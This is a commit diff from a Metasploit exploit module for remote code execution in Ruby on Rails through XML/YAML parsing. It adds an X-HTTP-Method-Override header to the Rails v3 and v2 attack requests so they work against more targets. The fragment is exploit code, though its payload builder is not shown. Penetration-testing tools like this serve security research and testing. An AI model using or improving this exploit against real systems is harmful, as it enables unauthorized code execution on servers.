Pass the X-HTTP-Method-Override parameter for compat

Author: HD Moore

modules/exploits/multi/http/rails_xml_yaml_code_exec.rb

@@ -166,19 +166,21 @@ def exploit
 
 		print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
 		res = send_request_cgi({
-			'uri'    => datastore['URIPATH'] || "/",
-			'method' => datastore['HTTP_METHOD'],
-			'ctype'  => 'application/xml',
-			'data'   => build_request(3)
+			'uri'     => datastore['URIPATH'] || "/",
+			'method'  => datastore['HTTP_METHOD'],
+			'ctype'   => 'application/xml',
+			'headers' => { 'X-HTTP-Method-Override' => 'get' },
+			'data'    => build_request(3)
 		}, 25)
 		handler
 
 		print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
 		res = send_request_cgi({
-			'uri'    => datastore['URIPATH'] || "/",
-			'method' => datastore['HTTP_METHOD'],
-			'ctype'  => 'application/xml',
-			'data'   => build_request(2)
+			'uri'     => datastore['URIPATH'] || "/",
+			'method'  => datastore['HTTP_METHOD'],
+			'ctype'   => 'application/xml',
+			'headers' => { 'X-HTTP-Method-Override' => 'get' },
+			'data'    => build_request(2)
 		}, 25)
 		handler
 	end